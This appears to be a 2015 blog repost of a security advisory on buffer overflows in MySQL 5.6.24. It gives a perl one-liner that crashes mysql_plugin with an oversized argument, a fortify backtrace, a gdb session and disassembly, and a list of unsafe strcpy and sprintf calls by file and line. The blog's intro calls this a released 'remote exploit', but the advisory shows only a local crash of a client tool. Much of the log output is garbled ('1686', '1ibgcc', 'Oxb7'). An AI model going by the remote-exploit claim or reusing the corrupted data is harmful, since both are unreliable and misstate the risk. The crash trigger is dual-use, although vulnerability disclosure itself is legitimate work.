Our Feeds

Thursday, 8 October 2015

AJITH KP

MySQL 5.6.24 Buffer Overflow Vulnerability

Hi GuyZ,
     Hackers have detected new BOF vulnerability in MySQL 5.6.24. The remote exploit has been released.


POC


a888b.
             d888888b.
             8P"YP"Y88
             8|o||o|88
             8' -  .88
             8`._.' Y8.
            d/      `8b.
           dP   .    Y8b.
          d8:'  "  `::88b
         d8"         'Y88b
        :8P    '      :888
         8a.   :     _a88P
       ._/"Yaa_:   .| 88P|
       \    YP"    `| 8P  `.
       /     \.___.d|    .'
       `--..__)888P`._.'
 
 
                           ~ Keeping Things Simple!
 
 
 
MySQL v5.6.24 BUFFER OVERFLOWS
 
 
Date: 07/10/2015
 
Author: Nicholas Lemonias
 
============================================================
 
 
========================
SUMMARY
=========================
 
During a manual source code audit of MYSQL Version 5.6.24, various
buffer overflow issues have been realized.
 
 
 
===================
TECHNICAL DETAILS
===================
 
 
root@priv8: ~# /usr/bin/mysql_plugin ‘perl -e ‘print “X” x 9000"
 
*** buffer overflow detected ***: mysql_plugin terminated
======= Backtrace: =========
/lib/i386-linux-gnu/i686/cmov/libc.so.6(+0x6c6f3)[0xb720d6f3]
/lib/i386-linux-gnu/1686/cmov/libc.so.6(__fortify_fail+0x45)[0xb729b2d5]
/lib/1386-linux-gnu/1686/cmov/libc.so.6(+0xf838a)[0xb729938a]
/lib/i386-linux-gnu/1686/cmov/libc.so.6(__strcpy_chk+0x37)[0xb7298877]
   insecure call
mysql_plugin(main+0x202)[0xb752ee22]
/lib/i386-linux-gnu/1686/cmov/libc.so.6(__libc_start_main+0xf3)[0xb71baa63]
mysql_plugin(+0xa90d)[0xb752f90d]
======= Memory map: ========
b6800000-b6821000 nw-p 00000000 00:00
b6821000-b6900000 ---p 00000000 00 00
b699d000-b699e000 ---p 00000000 00:00
b699e000-b71a1000 rw-p 00000000 00 00
b71a1000-b7345000 r-xp 00000000 00:13 1673
/lib/i386-linux-gnu/i686/cmov/libc-2.1
9.50
 
b7345000-b7347000 r-—p 001a4000 00:13 1673
/lib/i386-linux~gnu/i686/cmov/libc-2.1
9.so
 
b7347000-b7348000 rw-p 00la6000 00:13 1673
/lib/i386-linux-gnu/i686/cmov/libc-2.1
9.so
 
b7348000-b734b000 rw-p 00000000 00 00 0
 
b734b000-b7367000 r-xp 00000000 00:13 15697 /lib/i386-linux-gnu/1ibgcc_s.so.1
b7367000-b7368000 rw-p 0001b000 00:13 15697 /lib/i386-linux-gnu/1ibgcc_s.so.1
b7368000—b73ac000 r-xp 00000000 00:13 15649
/lib/i386-linux-gnu/1686/cmov/libm-2.1
9.so
bffc9000-c0000000 pw-p 00000000 00:00 0 [stack]
 
Program received signal SIGABRT, Aborted.
Oxb7fdebe0 in __kernel_vsyscall ()
(gdb) bt
#0 0xb7fdebe0 in __kernel_vsyscall ()
#1 0xb7caa307 in __GI_raise (sig=sig@entry=6)
at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
#2 0xb7cab9c3 in __GI_abort () at abort.c:89
#3 0xb7ce86f8 in __libc_message (do_abort=do_abort@entry=2,
fmt=fmt@entry=0xb7ddbe55 "*** %s ***: %s terminated\n”)
at ../sysdeps/posix/libc_fatal.c:175
#4 0xb7d762d5 in __GI___fortify_fail (
msg=msg@entry=0xb7ddbdd6 "buffer overflow detected”)
at fortify_fail.c:31
#5 0xb7d7438a in __GI___chk_fail () at chk_fail.c:28
#6 0xb7d73877 in __strcpy_chk (dest=0xbffe8c9c 'A' <repeats 200 times>...,
src=0xbffe96ed 'A' <repeats 200 times>..., destlen=<optimized out>)
at strcpy_chk.c:60
#7 0x80009e22 in main ()
 
(gdb)
 
 
 
(gdb) disas
Dump of assembler code for function __kernel_vsyscall:
 
0xb7fdebd0 <+0>: push %ecx
0xb7fdebd1 <+1>: push %edx
Oxb7fdebd2 <+2>: push %ebp
Oxb7fdebd3 <+3>: mov %esp,%ebp
0xb7fdebd5 <+5>: sysenter
Oxb7fdebd7 <+7>: nop
 
Oxb7fdebd8 <+8>: nop
 
0xb7fdebd9 <+9>: nop
 
Oxb7fdebda <+10>: nop
Oxb7fdebdb <+11>: nop
Oxb7fdebdc <+12>: nop
Oxb7fdebdd <+13>: nop
Oxb7fdebde <+14>: int x80
=> Oxb7fdebe0 <+16>: pop %ebp
Oxb7fdebe1 <+17>: pop %edx
0xb7fdebe2 <+18>: pop %ecx
Oxb7fdebe3 <+19>: ret
End of assembler dump.
 
(gdb)
 
 
============================
TECHNICAL SYNOPSIS / POC #2
============================
 
Unsafe Use of strcpy; this can lead to a buffer overflow condition
 
 
----->
/lib/i386-linux-gnu/1686/cmov/libc.so.6(__strcpy_chk+0x37)[0xb7298877]
 
A user-supplied string from the command-line is copied to a fixed
length destination buffer.
 
 
-----------------[ mysql_plugin.c]-------------------------------
 
Line: 796 - Filename: ../mysql/mysql-5.6.24/client/mysql_plugin.c
strcpy(plugin_name, argv[i]);
 
 
permission set:
 
-rwxr-xr-x 1 root root 2833756 Jul 15 21:22 /usr/bin/mysql_plugin
 
===============================================
MySQL V 5.6.24  VULNERABILITIES - SOURCE CODE
===============================================
 
 
1. Insecure use of sprintf
 
 
Vulnerability Description: A char*  type is copied to a fixed length
destination  buffer. This could lead to a buffer overflow.
 
Line: 577 - Filename: ../mysql/mysql-5.6.24/regex/main.c
 
sprintf(efbuf, "MY_REG_%s", name);
 
2.
 Unsafe Use of strcpy could lead to an overflow condition.
Vulnerability Description: A user-supplied string from the
command-line is copied to a fixed length destination buffer. This
could lead to a buffer overflow.
 
Line: 796 - Filename: ../mysql/mysql-5.6.24/client/mysql_plugin.c
strcpy(plugin_name, argv[i]);
 
3.
 Unsafe Use of strcpy  could  lead to an overflow condition.
Vulnerability Description: A user-supplied string from the
command-line is copied to a fixed length destination buffer. This
could lead to a buffer overflow.
 
Line: 797 - Filename: ../mysql/mysql-5.6.24/client/mysql_plugin.c
strcpy(config_file, argv[i]);
 
4.
Insecure use of sprintf.
Vulnerability Description: A char*  type is being copied  to a fixed
length destination  buffer. This could lead to a buffer overflow.
Line: 544 - Filename: ../mysql/mysql-5.6.24/regex/main.c
sprintf(grump, "matched null at `%.20s'", p);
 
5.
Insecure use of sprintf.
Vulnerability Description: A char*  type is being copied to a fixed
length destination buffer. This could lead to a buffer overflow.
Line: 525 - Filename: ../mysql/mysql-5.6.24/regex/main.c
sprintf(grump, "matched `%.*s'", len, p);
 
6.
 Unsafe Use of strcpy  could  lead to an overflow condition.
Vulnerability Description: A user-supplied string from the
command-line is being copied to a fixed length destination buffer.
This could lead to a buffer overflow.
Line: 413 - Filename:
../mysql/mysql-5.6.24/storage/ndb/src/kernel/blocks/dblqh/redoLogReader/reader.cpp
strcpy(fileName, argv[1]);
 
7.
Insecure use of sprintf.
Vulnerability Description: A char*  type is being copied  to a fixed
length destination buffer. This could lead to a buffer overflow.
Line: 531 - Filename: ../mysql/mysql-5.6.24/regex/main.c
sprintf(grump, "matched `%.*s' instead", len, p);
 
8.
Insecure use of sprintf.
Vulnerability Description: A char*  type is being copied  to a fixed
length destination  buffer. This could lead to a buffer overflow.
Line: 710 - Filename: ../mysql/mysql-5.6.24/client/mysqlshow.c
sprintf(query,"select count(*) from `%s`", table);
 
 
9.
Insecure use of sprintf
Vulnerability Description: A char*  type is being copied  to a fixed
length destination  buffer. This could lead to a buffer overflow.
Line: 121 - Filename: ../mysql/mysql-5.6.24/libmysql/conf_to_src.c
sprintf(buf, "%s.conf", set);
 
 
10.
 Unsafe Use of strcpy could  lead to an overflow condition.
Vulnerability Description: A char*  type is being copied  to a fixed
length destination  buffer. This could lead to a buffer overflow.
Line: 784 - Filename:
../mysql/mysql-5.6.24/storage/ndb/src/kernel/blocks/ndbfs/PosixAsyncFile.cpp
strcpy(path, src);
 
 
11.
 Unsafe Use of strcpy could lead to an overflow condition.
Vulnerability Description: A char*  type is being copied  to a fixed
length destination  buffer. This, could lead to an overflow.
Line: 377 - Filename:
../mysql/mysql-5.6.24/storage/ndb/src/kernel/blocks/ndbfs/Win32AsyncFile.cpp
strcpy(path, src);
<<<
Size of PATH is PATH_MAX 256